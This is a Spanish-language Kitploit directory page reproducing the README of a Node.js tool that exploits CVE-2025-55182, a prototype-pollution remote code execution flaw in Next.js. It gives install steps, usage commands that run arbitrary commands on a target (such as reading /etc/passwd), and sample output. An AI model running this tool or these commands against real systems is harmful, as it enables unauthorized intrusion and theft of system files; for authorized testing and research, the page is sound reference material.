Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-55182-node — CVE-2025-55182 Herramienta de Explotación RCE para Next.js | Kitploit
Herramientas/GitHubGitHub/racall/cve-2025-55182-node
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Herramienta de Explotación RCE para Next.js

Ver Repositorio
1hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 Herramienta de Explotación RCE para Next.js

Documento en chino | Análisis de la vulnerabilidad


[!CAUTION]

⚠️ AVISO - LEA ANTES DE USAR

Esta herramienta está destinada SOLO para:

  • Investigadores de seguridad realizando verificación de vulnerabilidades
  • Pruebas de penetración autorizadas con permiso explícito
  • Fines educativos y de aprendizaje

El acceso no autorizado a sistemas informáticos es ILEGAL.

Al usar esta herramienta, usted acepta que:

  1. Ha obtenido la autorización adecuada antes de probar cualquier sistema
  2. No usará esta herramienta con fines maliciosos
  3. Es el único responsable de sus acciones y de cualquier consecuencia

El autor NO asume ninguna responsabilidad por el uso indebido de esta herramienta.


Una herramienta de explotación de ejecución remota de código (RCE) para la vulnerabilidad de contaminación de prototipos del lado del servidor de Next.js.

Resumen de la vulnerabilidad

CVE-2025-55182 es una vulnerabilidad de seguridad crítica que afecta a Next.js y permite a atacantes lograr ejecución remota de código mediante solicitudes manipuladas que explotan la contaminación de prototipos.

📖 Para un análisis técnico detallado, consulte EXPLOIT.md

Versiones afectadas

  • Versiones específicas de Next.js (consulte el aviso de seguridad oficial)

Cómo funciona

Esta vulnerabilidad explota el mecanismo de manejo de solicitudes de Server Actions de Next.js, logrando ejecución de código arbitrario a través de la contaminación de la cadena de prototipos __proto__ combinada con el constructor Function.

Instalación

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

Uso

Ejecución directa

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

Usando scripts de yarn

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

Instalación global de CLI

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

Opciones de CLI

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

Formato de salida

La herramienta genera resultados en formato JSON:

Ejecución exitosa

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

Ejecución fallida

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

Ejemplo

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

Dependencias

  • axios - Cliente HTTP
  • form-data - Constructor de FormData

Referencias

  • Consultar scripts de Python
Descargar herramienta